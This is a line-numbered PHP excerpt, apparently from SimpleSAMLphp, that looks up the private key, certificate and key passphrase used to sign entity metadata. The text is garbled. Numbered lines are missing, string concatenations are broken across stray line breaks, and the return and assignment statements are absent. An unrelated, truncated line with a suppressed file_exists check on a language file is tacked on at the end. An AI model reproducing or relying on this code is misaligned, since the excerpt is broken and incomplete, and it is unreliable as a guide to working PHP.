This functions finds what key & certificate files should be used to sign the metadata for the given entity. 
   26    {
   27        
   28        if (array_key_exists('metadata.sign.privatekey', $entityMetadata)
   29            || array_key_exists('metadata.sign.certificate', $entityMetadata)
   30        ) {
   31 
   32            if (!array_key_exists('metadata.sign.privatekey', $entityMetadata)
   33                || !array_key_exists('metadata.sign.certificate', $entityMetadata)
   34            ) {
   35 
   36                throw new Exception(
   37                    'Missing either the "metadata.sign.privatekey" or the'.
   38                    ' "metadata.sign.certificate" configuration option in the metadata for'.
   39                    ' the '.
$type.
' "'.$entityMetadata[
'entityid'].
'". If one of'.
 
   40                    ' these options is specified, then the other must also be specified.'
   41                );
   42            }
   43 
   45                'privatekey'  => $entityMetadata['metadata.sign.privatekey'],
   46                'certificate' => $entityMetadata['metadata.sign.certificate']
   47            );
   48 
   49            if (array_key_exists('metadata.sign.privatekey_pass', $entityMetadata)) {
   50                $ret[
'privatekey_pass'] = $entityMetadata[
'metadata.sign.privatekey_pass'];
 
   51            }
   52 
   54        }
   55 
   56        
   57        $privatekey = 
$config->getString(
'metadata.sign.privatekey', 
null);
 
   61                throw new Exception(
   62                    'Missing either the "metadata.sign.privatekey" or the'.
   63                    ' "metadata.sign.certificate" configuration option in the global'.
   64                    ' configuration. If one of these options is specified, then the other'.
   65                    ' must also be specified.'
   66                );
   67            }
   69 
   70            $privatekey_pass = 
$config->getString(
'metadata.sign.privatekey_pass', 
null);
 
   71            if ($privatekey_pass !== null) {
   72                $ret[
'privatekey_pass'] = $privatekey_pass;
 
   73            }
   74 
   76        }
   77 
   78        
   79        if (array_key_exists('privatekey', $entityMetadata)
   80            || array_key_exists('certificate', $entityMetadata)
   81        ) {
   82 
   83            if (!array_key_exists('privatekey', $entityMetadata)
   84                || !array_key_exists('certificate', $entityMetadata)
   85            ) {
   86                throw new Exception(
   87                    'Both the "privatekey" and the "certificate" option must'.
   88                    ' be set in the metadata for the '.
$type.
' "'.
 
   89                    $entityMetadata['entityid'].'" before it is possible to sign metadata'.
   90                    ' from this entity.'
   91                );
   92            }
   93 
   95                'privatekey'  => $entityMetadata['privatekey'],
   96                'certificate' => $entityMetadata['certificate']
   97            );
   98 
   99            if (array_key_exists('privatekey_pass', $entityMetadata)) {
  100                $ret[
'privatekey_pass'] = $entityMetadata[
'privatekey_pass'];
 
  101            }
  102 
  104        }
  105 
  106        throw new Exception(
  107            'Could not find what key & certificate should be used to sign the metadata'.
  108            ' for the '.
$type.
' "'.$entityMetadata[
'entityid'].
'".' 
  109        );
  110    }
if(@file_exists(dirname(__FILE__).'/lang/eng.php')) $certificate